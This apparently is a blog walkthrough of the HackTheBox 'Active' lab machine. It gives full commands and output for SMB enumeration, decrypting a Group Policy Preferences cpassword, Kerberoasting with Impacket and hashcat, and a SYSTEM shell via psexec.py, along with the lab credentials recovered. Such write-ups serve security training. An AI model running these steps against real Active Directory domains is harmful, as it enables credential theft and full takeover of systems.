This post is about the Walkthrough of the hackthebox machine: Active
Hackthebox Active Walkthrough Link to heading
Reconnaissance Link to heading
Port-Scan Link to heading
ssudo nmap -sS -p- -Pn -T4 --min-rate 10000 -oN alltcp.txt 10.129.127.166
sudo nmap -sU -p- -Pn -T4 --min-rate 10000 -oN alludp.txt 10.129.127.166
[sudo] password for rocky:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-07-30 20:02 EDT
Warning: 10.129.127.166 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.129.127.166
Host is up (0.15s latency).
Not shown: 64371 closed ports, 1141 filtered ports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5722/tcp open msdfsr
9389/tcp open adws
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49169/tcp open unknown
49173/tcp open unknown
49174/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 20.30 seconds
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-07-30 20:02 EDT
Warning: 10.129.127.166 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.129.127.166
Host is up (0.16s latency).
Not shown: 65487 open|filtered ports, 47 closed ports
PORT STATE SERVICE
53/udp open domain
There are many ports like 389 which gives us the hint of active directory service like the name of the box says, I am going to enumerate some low hanging fruits like smb service to see if we have access to any shares and files.
SMB enumeration Link to heading
enum4linux 10.129.127.166 130 ⨯
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Jul 30 20:36:25 202
Share Enumeration on 10.129.127.166 |
===========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 10.129.127.166
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.129.127.166/ADMIN$ Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.129.127.166/C$ Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.129.127.166/IPC$ Mapping: OK Listing: DENIED
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.129.127.166/NETLOGON Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.129.127.166/Replication Mapping: OK, Listing: OK
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.129.127.166/SYSVOL Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.129.127.166/Users Mapping: DENIED, Listing: N/A
Refer the full output [here](Rchitect/enum4linuxoutput.txt at Yoda · tcprks/Rchitect · GitHub).
We can see a folder “replication” is having the anonymous read only option.
smbmap -H 10.129.127.166
[+] IP: 10.129.127.166:445 Name: 10.129.127.166
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
Lets review the folder to see the contents:
I could see a “groups.xml” which contain the local admininistartor password in encrypted format.
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> ls
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Groups.xml A 533 Wed Jul 18 16:46:06 2018
5217023 blocks of size 4096. 278651 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> exit
┌──(rocky㉿kali)-[~/hckbox/Active-1/smb]
└─$ cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
This was due to the Microsoft group policy preference. Due to this settings a sysvol is created with encrypted password of admin. More can be read here.
Now we dowloaded the encrypted password which we can try decrypt with “gpp-decrypt” which is inbuilt with Kali or you can from [github repository](GitHub - t0thkr1s/gpp-decrypt: Tool to parse the Group Policy Preferences XML file which extracts the username and decrypts the cpassword attribute.).
─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
Now we know the username and password, lets repeat the smb enumeration which we did anonymously earlier with newly decrypted password.
smbmap -H 10.129.66.52 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18
[+] IP: 10.129.66.52:445 Name: 10.129.66.52
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
Now we have more shared with read only access than “Replication”.
Lets try to connect to different folder now
mbclient //10.129.66.52/Users -U active.htb\\SVC_TGS%GPPstillStandingStrong2k18
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Jul 21 10:39:20 2018
.. DR 0 Sat Jul 21 10:39:20 2018
Administrator D 0 Mon Jul 16 06:14:21 2018
All Users DHSrn 0 Tue Jul 14 01:06:44 2009
Default DHR 0 Tue Jul 14 02:38:21 2009
Default User DHSrn 0 Tue Jul 14 01:06:44 2009
desktop.ini AHS 174 Tue Jul 14 00:57:55 2009
Public DR 0 Tue Jul 14 00:57:55 2009
SVC_TGS D 0 Sat Jul 21 11:16:32 2018
smb: \SVC_TGS\> cd Desktop\
smb: \SVC_TGS\Desktop\> ls
. D 0 Sat Jul 21 11:14:42 2018
.. D 0 Sat Jul 21 11:14:42 2018
user.txt AR 34 Sun Jul 31 19:41:32 2022
5217023 blocks of size 4096. 278635 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
Kereberoasting Link to heading
Kerebeos is protocol used for authentication in windows. We could aslo see the port 88 open on nmap scan which is related to kerberos. The attack on the vulnarability of kereberos protocol is called kerberoasting.
At very high level how the kereroasting works is like this:
as vald valid domain user we request DC to access particular service and and the DC sends a response back with encrypting the passoword of service account. Once we forward the response to service account, the service account can decrypt the passowrd and authorize us to access the service. However in kerberoasting instead of sending the response from DC directly to service , using the offline hash cracking solutions we crack the hash to get valid service account passwords.
For this to happen primarly 2 conditions required
a valid domain user to request the service
a DC user account control settings with “Do not require kerberos preauthentication”
These Post1, Post2, Post3 explains the Kereberoasting part very well. Or the one of the famous [video](Tim Medin - Attacking Kerberos: Kicking the Guard Dog of Hades - YouTube) is explains this in more details.
Getting SPNs Link to heading
Gettings SPN( which contains the encrypted passowrd hash respose) can be done in mutiple methods. one of them is a tool called “Impacket” are explained below:
Using Impacket Link to heading
Kali is having this Impacket tool which can be used to get the available user SPNs. Make sure the /etc/hosts files are updated hostname and IP. To use this command a valid domain username and password required which we already got thorough earlier enumeration.
Command :
GetUserSPNs.py -request -dc-ip 10.129.74.76 active.htb/SVC_TGS -save -outputfile GetUserSPNs1.out
Output
GetUserSPNs.py -request -dc-ip 10.129.74.76 active.htb/SVC_TGS -save -outputfile GetUserSPNs1.out
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2022-08-03 20:07:39.536132
┌──(rocky㉿kali)-[~/hckbox/Active-1/kerberoasting]
└─$ cat GetUserSPNs1.out
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$c81603cbceedab44362b6e0723a29feb$1b0f72c7806f0bd05ea6efa4373f40d61d34b791e1cb48eb0e0470acf024a924b623e52fc83d47520b3907a35ebdf55c12494a26c474dc59f776c94a0dee9da280f7b0f0ad8934c9f9c1f989b696f0e27c68b24541ba6884f0e88751f79248a9e10c9a57bb92f560a757b72034812395e3ab6c10cb73295dc37d920963261a43ee369093e94e9a350206f2a210d8a11f866bb9e3671fa88c4270007b51fce662454331d4d18dea3eba7dcdea0db3b5647a0ca07bb8dfea3d1f41a2fd5d1231d506d72f6a96584873341e57e4c0d425f6307ec577449ce458f00031ce1462f6fef70d39c8f8db59fd33bc483550a3790fc4a4850913cc24e8b22f205929722ba28ab1253d0c65a70e2396ce804a1e8732d5ee2edb843fb3c874086cabd0776321e842ce5e9f07513f2db3fb55bcd3e257e51c4f8cc9f12733ea57f56c343da51d0ca96c2e379173eae596e5a07beff95b1ddaf9ad166c8195e4bdac4a6bac4c058f77c7762ecd7f715092de92fb1f895d919a397799a1b636ad303d2155c8ceb520698325a2174f62b487439d2d56c5c469b6d7b3677eb6735a8ba68351cfdcd667de2648b2b9f8e2d37809e0aa8857a82e511688b68b1e78feb81c3018a07ba978fbe4aeda74f49f6bd8da32ee975f6be927acdaed93d119221b7d64856583f545113cba19057659bd18b164a8beb9f6563427d39e943189aa4375ae11c8fa8c6dfbed9444f59972aeefa1f67e5b969f38ccb63e62dd3ee0d18609afa42cfc6f30f3ac60d66238a274dc5c294b344ec9ee3630dda289125177a239f9e88215df32f83eb22af7100f89ae393fe09c851da432941e4ef99598ba003646f443af8003d9e8304bba32806260b6b56cd37b2ebb820303486348504342bd0c45bb7d068de395f9e5ca3c362ae5680007bc64aeccdaf60c677732a2598f4b16bae6db61330d46241af0f1c6d7be68693537f3bdbcc3956868a7975d0675c4d25204817d72bb0a32263d838f1e3bf8a211d2415e4becfa0dcf0a63a6303ac85d87f7d8cbf9dfa1e6ed04704a506084eff887d5b68978c0571f5d5733f173cc4400d3043f8b29e773ee1f58edd5c9f4e7928f788dd7ad28adf73959e4acd55869a645b63342164a550aeed14f404ebafa22f26e0ddaad68ba0b5ca49afdcf17d197b7385a1f20ef24abd4321ed8f8dddadebe306ad94ceced924da014fa5b36593f856dee064d85bff0a32e0b5e2cc3807672e3207cb21b04e4ecba3ff9c8
Based on the hashtype by looking here, we can use hashcat to crack with rockyou wordlist.
My VM Pc did not work with hashcat, so i have to do it on seprate PC.
On VM PC the error as follows:
On Physical PC:
c:\hashcat\hashcat-6.2.5\hashcat-6.2.5>.\hashcat.exe -m 13100 -a 0 "c:\hashcat\hashcat-6.2.5\hashcat-6.2.5\activehtb1spn.txt" "e:\OSCP wordlist\rockyou.txt" -o activecrakedkey.txt
hashcat (v6.2.5) starting
hipDeviceGetAttribute(): 1
Successfully initialized NVIDIA CUDA library.
Failed to initialize NVIDIA RTC library.
* Device #2: CUDA SDK Toolkit not installed or incorrectly installed.
CUDA SDK Toolkit required for proper device support and utilization.
Falling back to OpenCL runtime.
* Device #2: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
ADL2_Overdrive_Caps(): -8
ADL2_Overdrive_Caps(): -8
ADL2_Overdrive_Caps(): -8
ADL2_Overdrive_Caps(): -8
ADL2_Overdrive_Caps(): -8
nvmlDeviceGetFanSpeed(): Not Supported
ADL_Overdrive5_FanSpeed_Get(): -100
ADL_Overdrive5_Temperature_Get(): -100
HIP API (HIP 4.4)
=================
* Device #1: AMD Radeon(TM) Graphics, skipped
OpenCL API (OpenCL 3.0 CUDA 11.6.134) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #2: NVIDIA GeForce GTX 1650 with Max-Q Design, 3520/4095 MB (1023 MB allocatable), 14MCU
OpenCL API (OpenCL 2.1 AMD-APP (3354.13)) - Platform #2 [Advanced Micro Devices, Inc.]
======================================================================================
* Device #3: AMD Radeon(TM) Graphics, 6144/12380 MB (5043 MB allocatable), 8MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Initializing backend runtime for device #2. Please be patient...
Afer some time i have got the craked password and with the passoword, i have full access to smbshare which we accessed earlier.
We have the root file now even without getting the shell access
┌──(rocky㉿kali)-[~/hckbox/Active-1/smb]
└─$ smbclient //10.129.54.97/C$ -U active.htb\\administrator%Ticketmaster1968
Try "help" to get a list of possible commands.
smb: \> dir
$Recycle.Bin DHS 0 Mon Jul 13 22:34:39 2009
Documents and Settings DHSrn 0 Tue Jul 14 01:06:44 2009
pagefile.sys AHS 5190324224 Sat Aug 27 20:14:34 2022
PerfLogs D 0 Mon Jul 13 23:20:08 2009
Program Files DR 0 Wed Jan 12 08:11:58 2022
Program Files (x86) DR 0 Thu Jan 21 11:49:16 2021
ProgramData DHn 0 Wed Jan 12 08:09:27 2022
Recovery DHSn 0 Mon Jul 16 06:13:22 2018
System Volume Information DHS 0 Wed Jul 18 14:45:01 2018
Users DR 0 Sat Jul 21 10:39:20 2018
Windows D 0 Wed Jan 12 08:16:00 2022
5217023 blocks of size 4096. 278168 blocks available
smb: \> cd Users\Administrator\Desktop
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 34 as root.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
Provileiged Shell Link to heading
To login as admistrator command prompt, we can try “psexec.py”
psexec.py active.htb/administrator@10.129.54.97 1 ⨯
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
Password:
[*] Requesting shares on 10.129.54.97.....
[*] Found writable share ADMIN$
[*] Uploading file FVzkhpqi.exe
[*] Opening SVCManager on 10.129.54.97.....
[*] Creating service Urbc on 10.129.54.97.....
[*] Starting service Urbc.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> wwhoami
'wwhoami' is not recognized as an internal or external command,
operable program or batch file.
C:\Windows\system32> whoami
nt authority\system
